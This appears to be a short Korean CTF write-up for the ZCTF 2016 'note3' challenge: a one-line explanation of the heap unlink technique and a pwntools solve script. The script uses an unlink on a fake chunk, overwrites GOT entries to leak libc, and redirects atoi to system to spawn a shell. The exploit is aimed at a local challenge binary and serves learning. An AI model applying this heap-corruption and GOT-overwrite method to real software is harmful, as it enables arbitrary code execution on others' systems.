ZCTF_2016_note3
간단한 unlink이다
unlink 사용법 : fd(전역변수-0x18) + bk(전역변수-0x10) + prev_size(앞의 사이즈-0x10) + prev_inuse 해제(사이즈-0x1)
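# ZCTF 2016 "note3" solve script (pwntools).
# NOTE(review): written for Python 2 — p64()/p32() output is concatenated
# with str literals ('\x00' * 0x60, .replace('\x00', '')), which does not
# work on Python 3 where those return bytes.
# The listing on the page repeated the import and the new()/edit() helpers;
# the duplicates are dropped here, behaviour is otherwise unchanged.
from pwn import *


def new(size, content):
    """Drive menu option 1 (create a note): send size, then content."""
    sla('>>', '1')
    sla(')', str(size))
    sla(':', content)


def edit(idx, content):
    """Drive menu option 3 (edit note *idx*) and send the new content."""
    sla('>>', '3')
    sla(':', str(idx))
    sla(':', content)


def delete(idx):
    """Drive menu option 4 (delete note *idx*)."""
    sla('>>', '4')
    sla(':', str(idx))


r = process('./note3')
e = ELF('./note3')
libc = e.libc


def sla(x, y):
    """sendlineafter shorthand used by the menu helpers above."""
    return r.sendlineafter(x, y)


def ru(x):
    """recvuntil shorthand."""
    return r.recvuntil(x)


# Eight notes of the same size so the heap chunks are laid out predictably.
for i in range(8):
    new(0x80, 'A' * 8)

# Most negative signed 64-bit value, used as the note index in the edit below.
# NOTE(review): presumably this relies on how the binary checks the index —
# confirm against the challenge source/disassembly.
min_idx = -9223372036854775808
edit(3, 'A')
# Fake chunk header following the unlink formula in the text above:
# fd = target-0x18, bk = target-0x10, then the next chunk's prev_size/size
# with PREV_INUSE cleared.
payload = p64(0) + p64(0x81)
payload += p64(0x6020c0 - 0x18 + 0x20) + p64(0x6020c0 - 0x10 + 0x20)
payload += '\x00' * 0x60
payload += p64(0x80) + p64(0x90)
edit(min_idx, payload)
delete(4)  # the free that is meant to trigger the unlink (per the note above)
# Overwrite the note pointers with GOT entries, then redirect free@got to puts@plt.
payload2 = p64(e.got['free']) * 2 + p64(e.got['atoi']) * 2
edit(3, payload2)
edit(1, p32(e.plt['puts']) + '\x00\x00')
# NOTE(review): this interactive() looks like a debugging leftover — the
# leak below only runs after the interactive session is closed.
r.interactive()
delete(2)
r.recv(1)
# Libc base from the leaked atoi address (6-byte pointer, padded to 8).
leak = u64(ru('\x7f').ljust(8, '\x00')) - libc.symbols['atoi']
log.info(hex(leak))
edit(3, p64(leak + libc.symbols['system']).replace('\x00', ''))
sla('>>', '/bin/sh')
r.interactive()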